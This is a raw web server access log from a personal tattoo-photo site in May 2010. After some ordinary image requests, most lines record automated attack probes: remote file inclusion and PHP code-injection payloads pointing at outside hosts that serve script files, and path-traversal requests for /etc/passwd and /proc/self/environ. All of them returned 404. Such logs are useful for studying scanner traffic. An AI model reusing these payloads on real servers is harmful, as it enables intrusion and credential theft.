173.16.115.207 - - [01/May/2010:23:29:22 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:22 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:22 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:22 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:23 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:23 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:23 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:24 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:24 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:24 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:30:33 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:30:33 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:30:33 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:30:33 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
210.125.133.87 - - [01/May/2010:23:30:58 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:23:30:58 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:23:30:58 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:30:58 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:30:58 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:30:58 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:23:31:16 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:31:18 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:31:29 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:31:29 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:31:29 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:31:29 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:32:36 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:32:36 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:23:32:36 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:23:32:36 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:23:32:37 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:23:33:01 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:33:07 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:23:33:07 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:23:36:07 -0500] "GET /logs/access_log.1245974400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.22.100.83 - - [01/May/2010:23:36:51 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.22.100.83 - - [01/May/2010:23:37:19 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.129.119.42 - - [01/May/2010:23:43:33 -0500] "GET /logs/access_log.1210377600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [01/May/2010:23:49:17 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 200 586690 "-""Yandex/1.01.001 (compatible; Win16; I)"
58.230.162.220 - - [01/May/2010:23:59:09 -0500] "GET //components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:09 -0500] "GET /logs/access_log.1270598400%20%20//components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:09 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:09 -0500] "GET //components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:09 -0500] "GET /logs/access_log.1270598400%20%20//components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:09 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:15 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:15 -0500] "GET //components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [01/May/2010:23:59:15 -0500] "GET /logs/access_log.1270598400%20%20//components/com_flyspray/startdown.php?file=http://photokey.net/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:00:01:54 -0500] "GET /logs/access_log.1236297600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.190.166.35 - - [02/May/2010:00:02:05 -0500] "GET //language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
195.190.166.35 - - [02/May/2010:00:02:05 -0500] "GET /logs/access_log.1205539200//language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
195.190.166.35 - - [02/May/2010:00:02:05 -0500] "GET /logs//language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
195.190.166.35 - - [02/May/2010:00:02:05 -0500] "GET /logs/access_log.1209600000//language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
72.55.146.200 - - [02/May/2010:00:02:17 -0500] "GET //language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
72.55.146.200 - - [02/May/2010:00:02:17 -0500] "GET /logs/access_log.1209600000//language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
72.55.146.200 - - [02/May/2010:00:02:17 -0500] "GET /logs//language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.55.146.200 - - [02/May/2010:00:02:32 -0500] "GET /logs/access_log.1205539200//language/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
87.250.255.243 - - [02/May/2010:00:02:40 -0500] "GET /logs/access_log.1204848000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.163 - - [02/May/2010:00:09:05 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.163 - - [02/May/2010:00:10:16 -0500] "GET /logs/access_log.1241740800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.163 - - [02/May/2010:00:11:15 -0500] "GET /logs/access_log.1242864000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:00:14:22 -0500] "GET /logs/access_log.1248048000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.190 - - [02/May/2010:00:23:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.207.4.74 - - [02/May/2010:00:27:27 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "http://tomdolan.pconline.com/logs/access_log.1261699200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
78.110.50.139 - - [02/May/2010:00:29:43 -0500] "GET /logs//m2f/m2f_phpbb204.php?m2f_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:29:43 -0500] "GET //m2f/m2f_phpbb204.php?m2f_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:29:43 -0500] "GET /logs/access_log.1263081600//m2f/m2f_phpbb204.php?m2f_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:29:43 -0500] "GET /logs//m2f/m2f_phpbb204.php?m2f_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:29:43 -0500] "GET //m2f/m2f_phpbb204.php?m2f_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:29:43 -0500] "GET /logs/access_log.1263081600//m2f/m2f_phpbb204.php?m2f_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:31:29 -0500] "GET ///include/logout.php?PSA_PATH=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:31:29 -0500] "GET /logs/access_log.1229212800///include/logout.php?PSA_PATH=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:00:31:29 -0500] "GET /logs///include/logout.php?PSA_PATH=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:00:35:13 -0500] "GET /logs/access_log.1261094400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.42 - - [02/May/2010:00:46:17 -0500] "GET /logs/access_log.1235520000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.42 - - [02/May/2010:00:47:16 -0500] "GET /logs/access_log.1232064000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.162 - - [02/May/2010:00:47:38 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.162 - - [02/May/2010:00:48:35 -0500] "GET /logs/access_log.1246579200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.34.162.143 - - [02/May/2010:00:50:31 -0500] "GET /logs/index.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.34.162.143 - - [02/May/2010:00:50:31 -0500] "GET /index.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [02/May/2010:00:51:31 -0500] "GET /logs/access_log.1226361600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [02/May/2010:00:54:12 -0500] "GET //install.serverstat.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:00:54:22 -0500] "GET /logs/access_log.1265068800//install.serverstat.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:00:54:22 -0500] "GET /logs//install.serverstat.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:00:54:28 -0500] "GET //install.serverstat.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:00:54:33 -0500] "GET /logs//install.serverstat.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:00:54:34 -0500] "GET /logs/access_log.1265068800//install.serverstat.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:00:56:16 -0500] "GET /logs/access_log.1176768000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
206.210.68.43 - - [02/May/2010:01:01:58 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benibouayach.com/cache/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
206.210.68.43 - - [02/May/2010:01:01:58 -0500] "GET /logs/access_log.1268611200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benibouayach.com/cache/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
206.210.68.43 - - [02/May/2010:01:01:58 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benibouayach.com/cache/1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.210.68.43 - - [02/May/2010:01:02:13 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benibouayach.com/cache/1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.210.68.43 - - [02/May/2010:01:02:13 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benibouayach.com/cache/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
206.210.68.43 - - [02/May/2010:01:02:13 -0500] "GET /logs/access_log.1268611200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.benibouayach.com/cache/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
67.218.116.134 - - [02/May/2010:01:12:33 -0500] "GET /logs/access_log.1226880000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.110.50.139 - - [02/May/2010:01:12:48 -0500] "GET /logs/access_log.1264723200/contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:01:12:48 -0500] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:01:12:48 -0500] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:01:12:57 -0500] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:01:12:57 -0500] "GET /logs/access_log.1264723200/contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:01:12:57 -0500] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:01:12:57 -0500] "GET /logs/access_log.1263168000/contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:01:13:08 -0500] "GET /logs/access_log.1263168000/contrib/mx_glance_sdesc.php?mx_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:01:17:17 -0500] "GET /logs/access_log.1214697600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
99.39.2.249 - - [02/May/2010:01:23:01 -0500] "GET /logs//index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:01:23:01 -0500] "GET //index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [02/May/2010:01:25:44 -0500] "GET /logs/access_log.1176854400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.44 - - [02/May/2010:01:33:55 -0500] "GET /logs/access_log.1251676800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.245.85.109 - - [02/May/2010:01:38:07 -0500] "GET /logs/access_log.1262822400/phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:01:38:07 -0500] "GET /logs/phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:01:38:07 -0500] "GET /phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:01:40:57 -0500] "GET /logs/access_log.1202774400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.110.50.133 - - [02/May/2010:01:45:06 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_catalogproduction&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.neizzang.net///id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.110.50.133 - - [02/May/2010:01:45:06 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_catalogproduction&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.neizzang.net///id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
78.110.50.133 - - [02/May/2010:01:45:07 -0500] "GET /logs/access_log.1262563200/index.php?_REQUEST=&_REQUEST[option]=com_catalogproduction&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.neizzang.net///id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.133 - - [02/May/2010:01:45:22 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_catalogproduction&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.neizzang.net///id11.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.110.50.133 - - [02/May/2010:01:45:22 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_catalogproduction&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.neizzang.net///id11.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
78.110.50.133 - - [02/May/2010:01:45:22 -0500] "GET /logs/access_log.1262563200/index.php?_REQUEST=&_REQUEST[option]=com_catalogproduction&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.neizzang.net///id11.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.204.188 - - [02/May/2010:01:51:55 -0500] "GET /logs/access_log.1159056000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
